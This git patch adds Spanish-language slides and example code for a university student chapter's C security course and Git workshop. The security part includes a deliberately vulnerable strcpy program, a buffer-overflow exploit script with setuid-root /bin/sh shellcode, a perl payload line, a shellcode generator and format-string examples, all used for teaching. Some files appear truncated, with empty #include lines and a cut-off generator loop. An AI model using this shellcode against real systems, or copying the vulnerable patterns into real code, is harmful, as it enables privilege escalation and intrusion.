From 45ec0c7e1bfd251e13f4d3ade89785e98df31ba9 Mon Sep 17 00:00:00 2001 From: Guillermo Ramos Date: Mon, 27 May 2013 00:07:01 +0200 Subject: start --- c_seguridad/code/bof/.chuleta.txt | 1 + c_seguridad/code/bof/exit.asm | 8 + c_seguridad/code/bof/exploit.py | 23 ++ c_seguridad/code/bof/exploitable.c | 14 ++ c_seguridad/code/bof/shellcode | 1 + c_seguridad/code/bof/shellcodeGen/shellcodeGen.c | 73 ++++++ c_seguridad/code/bof/shellex.asm | 25 ++ c_seguridad/code/bof/test.c | 15 ++ c_seguridad/code/formatst/ejemplodospuntoce.c | 7 + c_seguridad/code/formatst/ejemplotrespuntoce.c | 7 + c_seguridad/code/stack/ejemplounopuntoce.c | 10 + c_seguridad/code/stack/stack.c | 9 + c_seguridad/code/strcmp.c | 19 ++ c_seguridad/present/acm.png | Bin 0 -> 31509 bytes c_seguridad/present/beamerthemeACM.sty | 68 ++++++ c_seguridad/present/cabecera.png | Bin 0 -> 2441974 bytes c_seguridad/present/img/Nuclear-Explosion.jpg | Bin 0 -> 538568 bytes c_seguridad/present/img/bof1.png | Bin 0 -> 22232 bytes c_seguridad/present/img/bof2.png | Bin 0 -> 20587 bytes c_seguridad/present/img/dudas.jpg | Bin 0 -> 4182 bytes c_seguridad/present/img/dudewtf.png | Bin 0 -> 53473 bytes c_seguridad/present/img/hacker.jpg | Bin 0 -> 890989 bytes c_seguridad/present/img/memoria_virtual.png | Bin 0 -> 22243 bytes c_seguridad/present/img/memory_org.png | Bin 0 -> 32880 bytes c_seguridad/present/img/nuclear_explosion.png | Bin 0 -> 2228596 bytes c_seguridad/present/img/ordenadorbob.jpg | Bin 0 -> 352973 bytes c_seguridad/present/img/showmethecode.png | Bin 0 -> 1049346 bytes c_seguridad/present/img/smith.png | Bin 0 -> 828008 bytes c_seguridad/present/img/stack_call_struct.png | Bin 0 -> 57091 bytes c_seguridad/present/img/stack_frame_struct.png | Bin 0 -> 30790 bytes c_seguridad/present/img/stack_overflow.png | Bin 0 -> 31297 bytes c_seguridad/present/img/stack_overflow_1.png | Bin 0 -> 31307 bytes c_seguridad/present/img/stack_overflow_2.png | Bin 0 -> 31234 bytes c_seguridad/present/seguridad.tex | 280 +++++++++++++++++++++++ git/present/Makefile | 5 + git/present/acm.png | Bin 0 -> 31509 bytes git/present/beamerthemeACM.sty | 68 ++++++ git/present/cabecera.png | Bin 0 -> 2441974 bytes git/present/git.tex | 95 ++++++++ git/present/img/dudas.jpg | Bin 0 -> 4182 bytes git/present/img/gitlocal.png | Bin 0 -> 66869 bytes git/present/img/gitremote.png | Bin 0 -> 44064 bytes git/present/img/reference.png | Bin 0 -> 1269745 bytes 43 files changed, 728 insertions(+) create mode 100644 c_seguridad/code/bof/.chuleta.txt create mode 100644 c_seguridad/code/bof/exit.asm create mode 100755 c_seguridad/code/bof/exploit.py create mode 100644 c_seguridad/code/bof/exploitable.c create mode 100644 c_seguridad/code/bof/shellcode create mode 100755 c_seguridad/code/bof/shellcodeGen/shellcodeGen.c create mode 100644 c_seguridad/code/bof/shellex.asm create mode 100644 c_seguridad/code/bof/test.c create mode 100644 c_seguridad/code/formatst/ejemplodospuntoce.c create mode 100644 c_seguridad/code/formatst/ejemplotrespuntoce.c create mode 100644 c_seguridad/code/stack/ejemplounopuntoce.c create mode 100644 c_seguridad/code/stack/stack.c create mode 100644 c_seguridad/code/strcmp.c create mode 100644 c_seguridad/present/acm.png create mode 100644 c_seguridad/present/beamerthemeACM.sty create mode 100644 c_seguridad/present/cabecera.png create mode 100644 c_seguridad/present/img/Nuclear-Explosion.jpg create mode 100644 c_seguridad/present/img/bof1.png create mode 100644 c_seguridad/present/img/bof2.png create mode 100644 c_seguridad/present/img/dudas.jpg create mode 100644 c_seguridad/present/img/dudewtf.png create mode 100644 c_seguridad/present/img/hacker.jpg create mode 100644 c_seguridad/present/img/memoria_virtual.png create mode 100644 c_seguridad/present/img/memory_org.png create mode 100644 c_seguridad/present/img/nuclear_explosion.png create mode 100644 c_seguridad/present/img/ordenadorbob.jpg create mode 100644 c_seguridad/present/img/showmethecode.png create mode 100644 c_seguridad/present/img/smith.png create mode 100644 c_seguridad/present/img/stack_call_struct.png create mode 100644 c_seguridad/present/img/stack_frame_struct.png create mode 100644 c_seguridad/present/img/stack_overflow.png create mode 100644 c_seguridad/present/img/stack_overflow_1.png create mode 100644 c_seguridad/present/img/stack_overflow_2.png create mode 100644 c_seguridad/present/seguridad.tex create mode 100644 git/present/Makefile create mode 100644 git/present/acm.png create mode 100644 git/present/beamerthemeACM.sty create mode 100644 git/present/cabecera.png create mode 100644 git/present/git.tex create mode 100644 git/present/img/dudas.jpg create mode 100644 git/present/img/gitlocal.png create mode 100644 git/present/img/gitremote.png create mode 100644 git/present/img/reference.png diff --git a/c_seguridad/code/bof/.chuleta.txt b/c_seguridad/code/bof/.chuleta.txt new file mode 100644 index 0000000..b5ddbf3 --- /dev/null +++ b/c_seguridad/code/bof/.chuleta.txt @@ -0,0 +1 @@ +Exploitable (repetir función): perl -e 'print "A"x72 . "\xd4\x83\x04\x08"' diff --git a/c_seguridad/code/bof/exit.asm b/c_seguridad/code/bof/exit.asm new file mode 100644 index 0000000..1ee5f18 --- /dev/null +++ b/c_seguridad/code/bof/exit.asm @@ -0,0 +1,8 @@ +SECTION .text +global _start +_start: + xor eax, eax + mov al, 1 + xor ebx, ebx + mov bl, 123 + int 0x80 diff --git a/c_seguridad/code/bof/exploit.py b/c_seguridad/code/bof/exploit.py new file mode 100755 index 0000000..5219755 --- /dev/null +++ b/c_seguridad/code/bof/exploit.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python2 +# -*- coding: utf-8 -*- + +from time import sleep +from os import system + + +shellcode = ( + # Buffer offset + "\x90"*17 + + + # Shellcode (55 chars) + "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x31\xc0\x5b" + "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" + "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" + "\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42" + + "\xf8\xf7\xff\xbf" + ) + +cmd = "./exploitable " + shellcode + +print shellcode diff --git a/c_seguridad/code/bof/exploitable.c b/c_seguridad/code/bof/exploitable.c new file mode 100644 index 0000000..5492a29 --- /dev/null +++ b/c_seguridad/code/bof/exploitable.c @@ -0,0 +1,14 @@ +#include +#include + +void vulnerable(char* str) { + printf("Entrando en vulnerable...\n"); + char arr[60]; + strcpy(arr, str); +} + +int main(int argc, char** argv) { + if (argc > 1) + vulnerable(*(argv+1)); + return 0; +} diff --git a/c_seguridad/code/bof/shellcode b/c_seguridad/code/bof/shellcode new file mode 100644 index 0000000..e36a2c5 --- /dev/null +++ b/c_seguridad/code/bof/shellcode @@ -0,0 +1 @@ +1À°F1Û1ÉÍ€ë1À[ˆC‰[‰C ° KS Í€èåÿÿÿ/bin/shNAAAABBBBø÷ÿ¿ diff --git a/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c b/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c new file mode 100755 index 0000000..0221f48 --- /dev/null +++ b/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c @@ -0,0 +1,73 @@ +/** + * + * BlackLight's shellcode generator for Linux x86 + * Tested anywhere, working & NULL-free + * + * Usage: ./generator + * ...and then you've got a ready2inject NULL-free shellcode for the command you like + * + * copyleft 2008 by BlackLight + * < http://blacklight.gotdns.org > + * + * Released under GPL v.3 licence + * + * Greetz to: evilsocket, for the idea he gave me ;) + * Greetz to: my friends, who tested, used and appreciated this code and helped + * me to improve it to what it is now + * Greetz to: my girl, next to me in any moment even if she had no idea + * about what I was doing ^^ + */ + +#include +#include +#include + +char code[] = + "\\x60" /*pusha*/ + "\\x31\\xc0" /*xor %eax,%eax*/ + "\\x31\\xd2" /*xor %edx,%edx*/ + "\\xb0\\x0b" /*mov $0xb,%al*/ + "\\x52" /*push %edx*/ + "\\x68\\x6e\\x2f\\x73\\x68" /*push $0x68732f6e*/ + "\\x68\\x2f\\x2f\\x62\\x69" /*push $0x69622f2f*/ + "\\x89\\xe3" /*mov %esp,%ebx*/ + "\\x52" /*push %edx*/ + "\\x68\\x2d\\x63\\x63\\x63" /*push $0x6363632d*/ + "\\x89\\xe1" /*mov %esp,%ecx*/ + "\\x52" /*push %edx*/ + "\\xeb\\x07" /*jmp 804839a */ + "\\x51" /*push %ecx*/ + "\\x53" /*push %ebx*/ + "\\x89\\xe1" /*mov %esp,%ecx*/ + "\\xcd\\x80" /*int $0x80*/ + "\\x61" /*popa*/ + "\\xe8\\xf4\\xff\\xff\\xff" /*call 8048393 */; + +int main (int argc, char **argv) { + int i,len=0; + char *shell,*cmd; + + if (!argv[1]) + exit(1); + + for (i=1; i + +int main(int argc, char** argv) { + if (argc > 1) + printf(argv[1]); + return 0; +} diff --git a/c_seguridad/code/formatst/ejemplotrespuntoce.c b/c_seguridad/code/formatst/ejemplotrespuntoce.c new file mode 100644 index 0000000..8e49d87 --- /dev/null +++ b/c_seguridad/code/formatst/ejemplotrespuntoce.c @@ -0,0 +1,7 @@ +#include + +int main(int argc, char** argv) { + if (argc > 1) + printf("%s", argv[1]); + return 0; +} diff --git a/c_seguridad/code/stack/ejemplounopuntoce.c b/c_seguridad/code/stack/ejemplounopuntoce.c new file mode 100644 index 0000000..4d2425e --- /dev/null +++ b/c_seguridad/code/stack/ejemplounopuntoce.c @@ -0,0 +1,10 @@ +#include + +char global; +float pi = 3.14; + +int main() { + int local; + char* buffer = (char*)malloc(20); + return 0; +} diff --git a/c_seguridad/code/stack/stack.c b/c_seguridad/code/stack/stack.c new file mode 100644 index 0000000..2987356 --- /dev/null +++ b/c_seguridad/code/stack/stack.c @@ -0,0 +1,9 @@ +#include + +int global = 0x11111111; + +int main() { + int local = 0x22222222; + char buffer[] = "AAAABBBBCCCCDDD"; + return 0; +} diff --git a/c_seguridad/code/strcmp.c b/c_seguridad/code/strcmp.c new file mode 100644 index 0000000..23ab60a --- /dev/null +++ b/c_seguridad/code/strcmp.c @@ -0,0 +1,19 @@ +#include +#include + +int main() { + char str1[] = "aaaa"; + char str2[] = "aaaa"; + + if (strcmp(str1, str2) == 0) + printf("strcmp: Son iguales\n"); + else + printf("strcmp: No son iguales\n"); + + if (str1 == str2) + printf("==: Son iguales\n"); + else + printf("==: No son iguales\n"); + + return 0; +} diff --git a/c_seguridad/present/acm.png b/c_seguridad/present/acm.png new file mode 100644 index 0000000..f083d8c Binary files /dev/null and b/c_seguridad/present/acm.png differ diff --git a/c_seguridad/present/beamerthemeACM.sty b/c_seguridad/present/beamerthemeACM.sty new file mode 100644 index 0000000..0d0e790 --- /dev/null +++ b/c_seguridad/present/beamerthemeACM.sty @@ -0,0 +1,68 @@ +\usetheme{Rochester} + +\RequirePackage{pgf} + +\pgfdeclareimage[width=1.0\paperwidth]{cabecera}{cabecera} + +\setbeamertemplate{blocks}[rounded][shadow=true] +\setbeamercovered{transparent} + +\beamer@headheight=0.14\paperwidth + +\definecolor{oxygenorange}{HTML}{F7800A} +\definecolor{oxygengray}{HTML}{686868} +\definecolor{oxygenlightgray}{HTML}{EEEEEE} +\definecolor{oxygenblue}{HTML}{236EAF} +\setbeamercolor*{Title bar}{fg=white} +\setbeamercolor*{Location bar}{fg=oxygenorange,bg=oxygenlightgray} +\setbeamercolor*{frametitle}{parent=Title bar} +\setbeamercolor*{block title}{bg=oxygenblue,fg=white} +\setbeamercolor*{block body}{bg=oxygenlightgray,fg=oxygengray} +\setbeamercolor*{normal text}{bg=white,fg=oxygengray} +\setbeamercolor*{section in head/foot}{bg=oxygenblue,fg=white} + +\usecolortheme[named=oxygenorange]{structure} + +\setbeamerfont{section in head/foot}{size=\tiny,series=\normalfont} +\setbeamerfont{frametitle}{size=\Large} + +%\setbeamertemplate{headline} +\setbeamertemplate{frametitle} +{ + \vskip-0.25\beamer@headheight + \vskip-\baselineskip + \vskip-0.2cm + \hskip0.7cm\usebeamerfont*{frametitle}\insertframetitle + \vskip-0.10em + \hskip0.7cm\usebeamerfont*{framesubtitle}\insertframesubtitle +} + +\setbeamertemplate{headline} +{ + \pgfuseimage{cabecera} + \vskip -1.95cm + \linethickness{0.0pt} + + \framelatex{ + \begin{beamercolorbox}[wd=\paperwidth,ht=0.3\beamer@headheight]{Title bar} + \usebeamerfont{section in head/foot}% + %\insertsectionnavigationhorizontal{0pt}{\hskip0.22cm}{}% + \end{beamercolorbox}} + + \framelatex{ + \begin{beamercolorbox}[wd=\paperwidth,ht=0.7\beamer@headheight]{Title bar} + \end{beamercolorbox}} +} + +\setbeamertemplate{footline} +{ + \linethickness{0.25pt} + \framelatex{ + \begin{beamercolorbox}[leftskip=.3cm,wd=\paperwidth,ht=0.3\beamer@headheight,sep=0.1cm]{Location bar} + \usebeamerfont{section in head/foot}% + \insertshortauthor~|~\insertshorttitle + \hfill + \insertframenumber/\inserttotalframenumber + \end{beamercolorbox}} +} + diff --git a/c_seguridad/present/cabecera.png b/c_seguridad/present/cabecera.png new file mode 100644 index 0000000..5c2f81c Binary files /dev/null and b/c_seguridad/present/cabecera.png differ diff --git a/c_seguridad/present/img/Nuclear-Explosion.jpg b/c_seguridad/present/img/Nuclear-Explosion.jpg new file mode 100644 index 0000000..f68597c Binary files /dev/null and b/c_seguridad/present/img/Nuclear-Explosion.jpg differ diff --git a/c_seguridad/present/img/bof1.png b/c_seguridad/present/img/bof1.png new file mode 100644 index 0000000..3b25c5e Binary files /dev/null and b/c_seguridad/present/img/bof1.png differ diff --git a/c_seguridad/present/img/bof2.png b/c_seguridad/present/img/bof2.png new file mode 100644 index 0000000..390d2a4 Binary files /dev/null and b/c_seguridad/present/img/bof2.png differ diff --git a/c_seguridad/present/img/dudas.jpg b/c_seguridad/present/img/dudas.jpg new file mode 100644 index 0000000..3a5599c Binary files /dev/null and b/c_seguridad/present/img/dudas.jpg differ diff --git a/c_seguridad/present/img/dudewtf.png b/c_seguridad/present/img/dudewtf.png new file mode 100644 index 0000000..7f1b30c Binary files /dev/null and b/c_seguridad/present/img/dudewtf.png differ diff --git a/c_seguridad/present/img/hacker.jpg b/c_seguridad/present/img/hacker.jpg new file mode 100644 index 0000000..986d05a Binary files /dev/null and b/c_seguridad/present/img/hacker.jpg differ diff --git a/c_seguridad/present/img/memoria_virtual.png b/c_seguridad/present/img/memoria_virtual.png new file mode 100644 index 0000000..97f14f9 Binary files /dev/null and b/c_seguridad/present/img/memoria_virtual.png differ diff --git a/c_seguridad/present/img/memory_org.png b/c_seguridad/present/img/memory_org.png new file mode 100644 index 0000000..17a9f0a Binary files /dev/null and b/c_seguridad/present/img/memory_org.png differ diff --git a/c_seguridad/present/img/nuclear_explosion.png b/c_seguridad/present/img/nuclear_explosion.png new file mode 100644 index 0000000..098dccc Binary files /dev/null and b/c_seguridad/present/img/nuclear_explosion.png differ diff --git a/c_seguridad/present/img/ordenadorbob.jpg b/c_seguridad/present/img/ordenadorbob.jpg new file mode 100644 index 0000000..479521c Binary files /dev/null and b/c_seguridad/present/img/ordenadorbob.jpg differ diff --git a/c_seguridad/present/img/showmethecode.png b/c_seguridad/present/img/showmethecode.png new file mode 100644 index 0000000..5ffd815 Binary files /dev/null and b/c_seguridad/present/img/showmethecode.png differ diff --git a/c_seguridad/present/img/smith.png b/c_seguridad/present/img/smith.png new file mode 100644 index 0000000..ee7b3fe Binary files /dev/null and b/c_seguridad/present/img/smith.png differ diff --git a/c_seguridad/present/img/stack_call_struct.png b/c_seguridad/present/img/stack_call_struct.png new file mode 100644 index 0000000..7d61f4c Binary files /dev/null and b/c_seguridad/present/img/stack_call_struct.png differ diff --git a/c_seguridad/present/img/stack_frame_struct.png b/c_seguridad/present/img/stack_frame_struct.png new file mode 100644 index 0000000..adf21d3 Binary files /dev/null and b/c_seguridad/present/img/stack_frame_struct.png differ diff --git a/c_seguridad/present/img/stack_overflow.png b/c_seguridad/present/img/stack_overflow.png new file mode 100644 index 0000000..1f33d35 Binary files /dev/null and b/c_seguridad/present/img/stack_overflow.png differ diff --git a/c_seguridad/present/img/stack_overflow_1.png b/c_seguridad/present/img/stack_overflow_1.png new file mode 100644 index 0000000..25f5415 Binary files /dev/null and b/c_seguridad/present/img/stack_overflow_1.png differ diff --git a/c_seguridad/present/img/stack_overflow_2.png b/c_seguridad/present/img/stack_overflow_2.png new file mode 100644 index 0000000..0963203 Binary files /dev/null and b/c_seguridad/present/img/stack_overflow_2.png differ diff --git a/c_seguridad/present/seguridad.tex b/c_seguridad/present/seguridad.tex new file mode 100644 index 0000000..1a422fa --- /dev/null +++ b/c_seguridad/present/seguridad.tex @@ -0,0 +1,280 @@ +% vim : tabstop 4 +%%%%%%%%%%%%%%%%%%%% +% seguridad.tex - Transparencias de la sección de Seguridad del Curso de C +% Guillermo Ramos Gutiérrez +%%%%%%%%%%%%%%%%%%%%% + +\documentclass{beamer} + +\mode +{ + \usetheme{ACM} + \setbeamercovered{transparent} +} + +\usepackage[spanish]{babel} +\usepackage[utf8]{inputenc} +\usepackage{times} +\usepackage{color} + +\title[Curso de C: Seguridad] +{Curso de C: Seguridad} + +\author[Guillermo Ramos] +{ +Guillermo Ramos \\ +\texttt{wille@acm.asoc.fi.upm.es} +} + +\institute[ACM FI - UPM] +{ +ACM Facultad de Informática \\ +Universidad Politécnica de Madrid +} + +\date{24 de marzo de 2011} + +\pgfdeclareimage[height=0.7cm]{acm-logo}{acm} +\logo{\pgfuseimage{acm-logo}} + +\AtBeginSection[] +{ + \begin{frame} + \frametitle{Contenido} + \tableofcontents[currentsection] + \end{frame} +} + +\begin{document} + + \begin{frame} + \titlepage + \end{frame} + + \begin{frame}{Contenido} + \tableofcontents + \end{frame} + + \section{¿De qué va todo esto?} + \begin{frame}{} + \begin{center} + \textbf{\huge 01010000} + \end{center} + \end{frame} + + \begin{frame}{} + \begin{center} + \textbf{\huge 01010001} \\ + \vspace{1cm} + \uncover<1>{¿0x50?} \\ + \uncover<2>{¿push eax?} \\ + \uncover<3>{¿true?} + \end{center} + \end{frame} + + \begin{frame}{} + \begin{center} + \textbf{\huge 01010000} \\ + \vspace{1cm} + $\surd$ 0x50 \\ + $\surd$ push eax \\ + $\surd$ true + \end{center} + \end{frame} + + \begin{frame}{} + \begin{center} + \includegraphics[width=3cm]{img/dudewtf.png} + \end{center} + \end{frame} + + \begin{frame}{En resumen} + \begin{itemize} + \item Problema: \textbf{distinguir datos de código} + \item La información no tiene más significado que el que le da un proceso. + \item Esto se suele aprovechar para controlar los fallos de software y modificar el flujo de ejecución. + \end{itemize} + \end{frame} + + + \section{Memoria} + \subsection{Memoria Virtual} + \begin{frame}{Memoria Virtual} + \begin{center} + \includegraphics[width=6cm]{img/memoria_virtual.png} + \end{center} + \end{frame} + + \subsection{Organización de memoria} + \begin{frame}{Organización de memoria} + \begin{center} + \includegraphics[width=6cm]{img/memory_org.png} + \end{center} + \end{frame} + + \begin{frame}{Ejemplo} + \begin{center} + \begin{block}{ejemplounopuntocé.c} + char global; \\ + float pi = 3.14; \\[3mm] + int main() \{ \\ + \hspace{1cm}int local; \\ + \hspace{1cm}char* buffer = (char*)malloc(20); \\ + \hspace{1cm}return 0; \\ + \} + \end{block} + \end{center} + \end{frame} + + \begin{frame}{Ejemplo} + \begin{center} + \begin{block}{ejemplounopuntocé.c} + char global; \textcolor{red}{// bss} \\ + float pi = 3.14; \textcolor{red}{// data} \\[3mm] + int main() \{ \textcolor{red}{// code} \\ + \hspace{1cm}int local; \textcolor{red}{// stack} \\ + \hspace{1cm}char* buffer = (char*)malloc(20); \textcolor{red}{// heap (*buffer)} \\ + \hspace{1cm}return 0; \\ + \} + \end{block} + \end{center} + \end{frame} + + \subsection{La pila} + \begin{frame}{La pila} + Guarda el estado de las funciones en \textbf{marcos de pila} \\ + Cada marco de pila almacena: + \begin{itemize} + \item Parámetros + \item Variables locales + \item Dirección de retorno de la función + \end{itemize} + \end{frame} + + \begin{frame}{El marco de pila} + \begin{center} + \includegraphics[width=6cm]{img/stack_frame_struct.png} + \end{center} + \end{frame} + + \begin{frame}{La pila} + \begin{center} + \includegraphics[width=6cm]{img/stack_call_struct.png} + \end{center} + \end{frame} + + \begin{frame}{Ejemplos} + \begin{center} + \includegraphics[width=6cm]{img/showmethecode.png} + \end{center} + \end{frame} + + + \section{Buffer Overflows} + \begin{frame}{Introducción} + \begin{center} + \textit{At first I was like...} \\[3mm] + \includegraphics[width=8cm]{img/bof1.png} + \end{center} + \end{frame} + + \begin{frame}{Introducción} + \begin{center} + \textit{... but then I was like...} \\[3mm] + \includegraphics[width=7cm]{img/nuclear_explosion.png} + \end{center} + \end{frame} + + \begin{frame}{Introducción} + \begin{center} + Un buffer overflow ocurre cuando no se controla la cantidad de datos que se pueden + copiar en un buffer y se sigue escribiendo tras haberlo rellenado, provocando + la sobreescritura de la memoria adyacente a él. \\[3mm] + \includegraphics[width=6cm]{img/bof2.png} + \end{center} + \end{frame} + + \begin{frame}{Introducción} + \begin{center} + \includegraphics[width=8cm]{img/stack_overflow_1.png} + \end{center} + \end{frame} + + \begin{frame}{Introducción} + \begin{center} + \includegraphics[width=8cm]{img/stack_overflow_2.png} + \end{center} + \end{frame} + + \begin{frame}{Introducción} + \begin{center} + \includegraphics[width=8cm]{img/stack_overflow.png} + \end{center} + \end{frame} + + \begin{frame}{Ejemplos} + \begin{center} + \includegraphics[width=6cm]{img/showmethecode.png} + \end{center} + \end{frame} + + + \section{Format Strings} + \begin{frame}{Introducción} + \begin{center} + \begin{block}{ejemplodospuntocé.c} + int main(int argc, char** argv) \{ \\ + \hspace{1cm}if (argc $>$ 1) \\ + \hspace{2cm}printf(argv[1]); \\ + \hspace{1cm}return 0; \\ + \} + \end{block} + \begin{block}{ejemplotrespuntocé.c} + int main(int argc, char** argv) \{ \\ + \hspace{1cm}if (argc $>$ 1) \\ + \hspace{2cm}printf("\%s", argv[1]); \\ + \hspace{1cm}return 0; \\ + \} + \end{block} + \end{center} + \end{frame} + + \begin{frame}{\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x} + \begin{center} + Un ataque de format strings es una inyección de caracteres que hace que printf() o cualquier + derivado interprete que debe insertar parámetros en la salida. Al no haberlos, usa memoria + de la pila. + \end{center} + \end{frame} + + \begin{frame}{Ejemplos} + \begin{center} + \includegraphics[width=6cm]{img/showmethecode.png} + \end{center} + \end{frame} + + + \section{} + \begin{frame}{} + \begin{center} + ¿Dudas, preguntas? \\ + \includegraphics[width=5cm]{img/dudas.jpg} + \end{center} + \end{frame} + + \begin{frame}{} + \textbf{Bibliografía recomendada:} + \begin{thebibliography}{99} + \bibitem{} \htmladdnormallink{Erickson, J. (2008). \textit{The Art of Exploitation, 2nd Edition}}{http://www.amazon.com/Hacking-Art-Exploitation-Jon-Erickson/dp/1593271441/} + \bibitem{} \htmladdnormallink{Anley, C., Heasman, J., Lindner, F., Richarte, G. (2007). \textit{The Shellcoder's + Handbook: Discovering and Exploiting Security Holes}}{http://www.amazon.com/Shellcoders-Handbook-Discovering-Exploiting-Security/dp/047008023X/} + \end{thebibliography} + \end{frame} + + \begin{frame}{} + \begin{center} + \textbf{¡Gracias por venir!} + \end{center} + \end{frame} + +\end{document} diff --git a/git/present/Makefile b/git/present/Makefile new file mode 100644 index 0000000..0fa5dda --- /dev/null +++ b/git/present/Makefile @@ -0,0 +1,5 @@ +quick: + pdflatex git.tex + +release: quick + pdflatex git.tex diff --git a/git/present/acm.png b/git/present/acm.png new file mode 100644 index 0000000..f083d8c Binary files /dev/null and b/git/present/acm.png differ diff --git a/git/present/beamerthemeACM.sty b/git/present/beamerthemeACM.sty new file mode 100644 index 0000000..0d0e790 --- /dev/null +++ b/git/present/beamerthemeACM.sty @@ -0,0 +1,68 @@ +\usetheme{Rochester} + +\RequirePackage{pgf} + +\pgfdeclareimage[width=1.0\paperwidth]{cabecera}{cabecera} + +\setbeamertemplate{blocks}[rounded][shadow=true] +\setbeamercovered{transparent} + +\beamer@headheight=0.14\paperwidth + +\definecolor{oxygenorange}{HTML}{F7800A} +\definecolor{oxygengray}{HTML}{686868} +\definecolor{oxygenlightgray}{HTML}{EEEEEE} +\definecolor{oxygenblue}{HTML}{236EAF} +\setbeamercolor*{Title bar}{fg=white} +\setbeamercolor*{Location bar}{fg=oxygenorange,bg=oxygenlightgray} +\setbeamercolor*{frametitle}{parent=Title bar} +\setbeamercolor*{block title}{bg=oxygenblue,fg=white} +\setbeamercolor*{block body}{bg=oxygenlightgray,fg=oxygengray} +\setbeamercolor*{normal text}{bg=white,fg=oxygengray} +\setbeamercolor*{section in head/foot}{bg=oxygenblue,fg=white} + +\usecolortheme[named=oxygenorange]{structure} + +\setbeamerfont{section in head/foot}{size=\tiny,series=\normalfont} +\setbeamerfont{frametitle}{size=\Large} + +%\setbeamertemplate{headline} +\setbeamertemplate{frametitle} +{ + \vskip-0.25\beamer@headheight + \vskip-\baselineskip + \vskip-0.2cm + \hskip0.7cm\usebeamerfont*{frametitle}\insertframetitle + \vskip-0.10em + \hskip0.7cm\usebeamerfont*{framesubtitle}\insertframesubtitle +} + +\setbeamertemplate{headline} +{ + \pgfuseimage{cabecera} + \vskip -1.95cm + \linethickness{0.0pt} + + \framelatex{ + \begin{beamercolorbox}[wd=\paperwidth,ht=0.3\beamer@headheight]{Title bar} + \usebeamerfont{section in head/foot}% + %\insertsectionnavigationhorizontal{0pt}{\hskip0.22cm}{}% + \end{beamercolorbox}} + + \framelatex{ + \begin{beamercolorbox}[wd=\paperwidth,ht=0.7\beamer@headheight]{Title bar} + \end{beamercolorbox}} +} + +\setbeamertemplate{footline} +{ + \linethickness{0.25pt} + \framelatex{ + \begin{beamercolorbox}[leftskip=.3cm,wd=\paperwidth,ht=0.3\beamer@headheight,sep=0.1cm]{Location bar} + \usebeamerfont{section in head/foot}% + \insertshortauthor~|~\insertshorttitle + \hfill + \insertframenumber/\inserttotalframenumber + \end{beamercolorbox}} +} + diff --git a/git/present/cabecera.png b/git/present/cabecera.png new file mode 100644 index 0000000..5c2f81c Binary files /dev/null and b/git/present/cabecera.png differ diff --git a/git/present/git.tex b/git/present/git.tex new file mode 100644 index 0000000..f4099d1 --- /dev/null +++ b/git/present/git.tex @@ -0,0 +1,95 @@ +%%%%%%%%%%%%%%%%%%%% +% git.tex - Transparencias del curso de Git +% Guillermo Ramos Gutiérrez +%%%%%%%%%%%%%%%%%%%%% + +\documentclass{beamer} + +\mode +{ + \usetheme{ACM} + \setbeamercovered{transparent} +} + +\usepackage[spanish]{babel} +\usepackage[utf8]{inputenc} +\usepackage{times} +\usepackage{color} + +\title[Taller de Git] +{Taller de Git} + +\author[Guillermo Ramos] +{ +Guillermo Ramos \\ +\texttt{wille@acm.asoc.fi.upm.es} +} + +\institute[ACM FI - UPM] +{ +ACM Facultad de Informática \\ +Universidad Politécnica de Madrid +} + +\date{02 de febrero de 2012} + +\pgfdeclareimage[height=0.7cm]{acm-logo}{acm} +\logo{\pgfuseimage{acm-logo}} + +\AtBeginSection[] +{ + \begin{frame} + \frametitle{Contenido} + \tableofcontents[currentsection] + \end{frame} +} + +\begin{document} + + \begin{frame} + \titlepage + \end{frame} + + \begin{frame}{Contenido} + \tableofcontents + \end{frame} + + \section{Local} + \begin{frame}{} + \begin{center} + \includegraphics[width=7cm]{img/gitlocal.png} + \end{center} + \end{frame} + + \section{Remoto} + \begin{frame}{} + \begin{center} + \includegraphics[width=7cm]{img/gitremote.png} + \end{center} + \end{frame} + + \section{} + \begin{frame}{} + \begin{center} + \includegraphics[width=7cm]{img/reference.png} \\ + \vspace{1cm} + \footnotesize http://tinyurl.com/tallergit-reference + \end{center} + \end{frame} + + \section{} + \begin{frame}{} + \textbf{Bibliografía recomendada:} + \begin{thebibliography}{99} + \bibitem{} \htmladdnormallink{Chacon, Scott. \textit{Pro Git}}{http://progit.org/} + \bibitem{} \htmladdnormallink{Loeliger, Jon (2009). \textit{Version Control with Git}}{http://shop.oreilly.com/product/9780596520137.do} + \end{thebibliography} + \end{frame} + + \begin{frame}{} + \begin{center} + \textbf{¡Gracias por venir!} + \end{center} + \end{frame} + +\end{document} diff --git a/git/present/img/dudas.jpg b/git/present/img/dudas.jpg new file mode 100644 index 0000000..3a5599c Binary files /dev/null and b/git/present/img/dudas.jpg differ diff --git a/git/present/img/gitlocal.png b/git/present/img/gitlocal.png new file mode 100644 index 0000000..ae2be7e Binary files /dev/null and b/git/present/img/gitlocal.png differ diff --git a/git/present/img/gitremote.png b/git/present/img/gitremote.png new file mode 100644 index 0000000..26ad541 Binary files /dev/null and b/git/present/img/gitremote.png differ diff --git a/git/present/img/reference.png b/git/present/img/reference.png new file mode 100644 index 0000000..1b8a64c Binary files /dev/null and b/git/present/img/reference.png differ -- cgit v1.2.3